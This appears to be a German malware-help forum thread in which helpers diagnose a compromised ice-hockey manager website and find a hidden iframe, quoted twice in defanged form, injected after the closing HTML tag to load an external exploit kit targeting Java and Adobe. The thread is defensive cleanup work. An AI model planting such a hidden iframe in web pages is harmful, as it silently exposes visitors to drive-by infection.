Hallo,

Ich stehe vor einem Rätsel.
Ich betreibe mit einigen Kollegen einen Online Eishockey Manager und wir haben seit einiger Zeit das Problem, das bei einigen Managern deren Virenprogramm (in den meisten Fällen antivir) beim Besuch unserer Homepage/Forum, Alarm schlägt.

Bei einem Mitglied hat sich sogar angeblich nach dem Besuch unserer Homepage etwas mit dem Namen "system progressive protection" installiert und er hat daraufhin wohl einen Großteil seiner Daten verloren...

Nur begreife ich das ganze nicht... Ich selber nutzte bis vergangenen Monat noch Kaspersky, welches NIE beim Besuch der Seite gemeckert hatte, auch wenn ich von der Arbeit aus die Seite aufgerufen habe, gab es nie Meldungen in der Art und dort nutzen wir Norton...
Auch bei einigen anderen Managern gab es nie solche Meldungen...
Darum kann ich das ganze nicht so recht glauben, das die Seite wirklich befallen ist..

Ich habe die Seite auch schon von Norton Safe Web scannen lassen, alles tadellos... Auch google sagt, die Seite ist frei von jeglicher Malware... Gleiche gilt für Websitedefender... auch dort wird mir gesagt, die Seite ist sauber...

Auch mein Hoster, sagt mir das diese keinerlei Meldungen erhalten haben... Wenn dem so wäre, wären die befallenen Dateien/Seiten auch schon längst gesperrt worden...


Ist es denn möglich, das der Befall sich nur auf bestimmte User auswirkt? Finde es halt nur komisch, das bei manchen das Virenprogramm meckert, einer sogar einen richtigen Befall hatte und die meisten überhaupt keine Probleme haben...


Und das die Virenprogramme hin und wieder meckern ist ja auch nicht ungewöhnlich... Google Chrome meckert bei mir hin und wieder auch, wenn ich mal eine Seite (z.B. Forenseite von meinem Fussballverein, meinem Lieblingsitaliener) aufrufe, diese sei Malware verseucht etc.



Könnt ihr mir weiterhelfen? Möchte nicht unnötig die Homepage platt machen...


mfg

Vain

Hi ein paar der fundmeldungen hier währen interessant.
übrigens bei der Rogue gehen die Daten nicht verloren, der gute Mann soll sich mal hier melden.
die seite währe auch günstig.

Also die Seite ist:
hxxp://www-tiger-area.com
und das Forum ist über:
hxxp://tiger-area.com/wbb3/
zu erreichen.

Also Fundmeldungen waren:
Web Attack Toolkit Website 8
Angreifender PC : Panelallegro.1110.pl

bei nem anderen ist die Seite gesperrt worden mit der Begründung "unsicheres Programm"

die hier oder?
onlineeishockeymanager.de

Zitat:

Zitat von markusg

die hier oder?
onlineeishockeymanager.de

tiger-area.com

bzw. forum:

tiger-area.com/wbb3/

Halli Hallo

die Frameset-Seite von tiger-area.com ist in jedem Fall verseucht!

Zum Schluss wird noch hinter dem schließenden HTML-Tag ein Inlineframe eingebunden:

Code: Alles auswählenAufklappen

ATTFilter

<iframe src="hxxp://illadearousa.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
         

Der Inhalt des Frames bindet wiederum ein Inline-Frame ein, hinter welchem sich ein Exploit-Kit verbirgt...
Dessen Inhalt hab ich noch nicht so gerafft (very obfuscated )- Fortsetzung folgt.

Am besten, du suchst in jedem Fall die gesamte Seite einmal durch.
Wer weiß, was da noch so rumschwirrt...

Einen schönen Abend noch

hi
danke, währs möglich eine Kopie der Index.php zu bekommen?
bei
File-Upload.net - Ihr kostenloser File Hoster!
hochladen, link an mich als private nachicht.
ps von der
tiger-area.com

@handball10
schön mal wieder von dir zu lesen :-)

schonmal vielen dank euch beiden,

habe die index.php geschickt. jedoch vom forum. denn bei tiger-area.com ist die index ja eine .htm seite...
Hoffe das ist richtig so

Zitat:

Zitat von handball10

Halli Hallo

die Frameset-Seite von tiger-area.com ist in jedem Fall verseucht!

Zum Schluss wird noch hinter dem schließenden HTML-Tag ein Inlineframe eingebunden:

Code: Alles auswählenAufklappen

ATTFilter

<iframe src="hxxp://illadearousa.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
         

Der Inhalt des Frames bindet wiederum ein Inline-Frame ein, hinter welchem sich ein Exploit-Kit verbirgt...
Dessen Inhalt hab ich noch nicht so gerafft (very obfuscated )- Fortsetzung folgt.

Am besten, du suchst in jedem Fall die gesamte Seite einmal durch.
Wer weiß, was da noch so rumschwirrt...

Einen schönen Abend noch

Hmm wie kann ich die Seite denn überprüfen?
habe mir jetzt einfach mal die startseite runtergezogen, also die index.htm...
und jetzt meckert auch kaspersky bei mir und löscht die datei sofort...

hi dann die index.html.

problem ist, ich bekomme die nich heruntergeladen... kaspersky löscht die sofort ... oder kann ich da eine ausnahme setzen? also die datei erlauben?

Update:

Sämtliche Dateien .htm-Dateien (außer unten.htm) enthalten auch den Inline-Frame.

Eingebunden wird ein Exploit, welcher nach verwundbaren Java- und Adobe-Versionen sucht.
Also auch auf den genannten Seiten säubern!

handball10

müsste sich kurzfristig deaktivieren lassen, versuch mal über rechtsklick auf das Symbol im Infobereich.

hab dir die datei geschickt

danke.
hast du backups deiner homepages? dann könnte man die einspielen, natürlich vorher schauen ob das frame eingebunden ist am ende der seite.